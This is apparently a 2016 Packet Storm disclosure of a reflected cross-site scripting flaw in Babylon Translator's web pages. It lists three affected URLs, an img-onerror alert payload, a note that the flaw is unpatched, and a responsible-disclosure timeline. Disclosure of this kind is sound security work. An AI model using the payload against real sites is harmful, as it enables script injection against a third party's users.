exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Babylon Translator Cross Site Scripting

Babylon Translator Cross Site Scripting
Posted Jun 2, 2016
Authored by Francisco Javier Santiago Vazquez

Babylon Translator suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 437506dc14a1742e3d449c69b8d154fb0b8582bb4cb44e1d81df1db63e91d579

Babylon Translator Cross Site Scripting

Change Mirror Download
I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting (XSS)



II. PROOF OF CONCEPT
-------------------------

*URL: *

1. http://espanol.babylon-software.com/bht/index.html?trid=
2. http://traductor.babylon-software.com/ingles/a-espanol/
3. http://traduccion.babylon-software.com/?trid=

*Vector:* <img src=1 onerror=alert("n0ipr0cs");>/

*State:* unpathed



III. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Translator and web Babylon.



IV. ABOUT BABYLON

-------------------------

Babylon was founded in 1997 and is headquartered in Tel Aviv (Israel).
Babylon offers different and various services to end users and
businesses.

The translator offers translations in 77 languages, English is also
available. The software is sold worldwide and is used in more than 168
countries and has a growing base of users of desktop installations
more than 90 million. In addition it has app for Iphone, Android,
Windows, Blackberry and Kindle and even a pro for business service.

On the other hand, there is monetization services for providers of
contents and web publishers web sites, bloggers and webmasters.

This company even has search services on the web, yes also is a search engine.




V. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez aka "n0ipr0cs"
(https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).



VI. DISCLOSURE TIMELINE
-------------------------
April 03, 2016: Vulnerability acquired by Francisco Javier Santiago
Vázquez. aka "n0ipr0cs".
April 03, 2016 Responsible disclosure to Babylon Security Team.
April 04, 2016 Responsible disclosure to Babylon Security Team.
May 18, 2016 Responsible disclosure to Babylon Security Team.

June 02, 2016 Disclosure.



VII. Links
------------------------
POC: http://www.estacion-informatica.com/2016/06/xss-en-babylon.html







*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close